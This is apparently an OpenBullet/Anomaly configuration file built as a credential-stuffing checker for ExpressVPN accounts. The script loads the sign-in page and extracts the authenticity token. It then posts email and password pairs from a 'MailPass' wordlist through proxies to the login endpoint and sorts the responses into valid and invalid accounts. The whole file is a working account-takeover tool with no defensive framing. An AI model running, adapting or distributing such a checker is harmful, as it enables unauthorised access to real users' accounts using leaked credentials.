[SETTINGS] { "Name": "ExpressVPN", "SuggestedBots": 85, "MaxCPM": 0, "LastModified": "2020-04-14T03:18:12.4674402+04:30", "AdditionalInfo": "", "Author": "Im3eyyeD", "Version": "1.4.1 [Anomaly]", "LoliSave": false, "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "EncodeData": false, "AllowedWordlist1": "MailPass", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "CaptchaUrl": "", "Base64": "", "Grayscale": false, "RemoveLines": false, "RemoveNoise": false, "Dilate": false, "Threshold": 1.0, "DiffKeep": 0.0, "DiffHide": 0.0, "Saturate": false, "Saturation": 0.0, "Transparent": false, "OnlyShow": false, "ContrastGamma": false, "Contrast": 1.0, "Gamma": 1.0, "Brightness": 1.0, "RemoveLinesMin": 0, "RemoveLinesMax": 0, "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [SCRIPT] #get REQUEST GET "https://www.expressvpn.net/sign-in" HEADER "Connection: keep-alive" HEADER "Cache-Control: max-age=0" HEADER "Origin: https://www.expressvpn.net" HEADER "Upgrade-Insecure-Requests: 1" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" #token PARSE "" LR "\"authenticity_token\" value=\"" "\"" EncodeOutput=TRUE -> VAR "authenticity_token" #post REQUEST POST "https://www.expressvpn.net/sessions" CONTENT "utf8=%E2%9C%93&authenticity_token=&email=&password=" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" #check KEYCHECK KEYCHAIN Failure OR KEY "Invalid email or password." KEYCHAIN Success OR KEY "\">Verification code"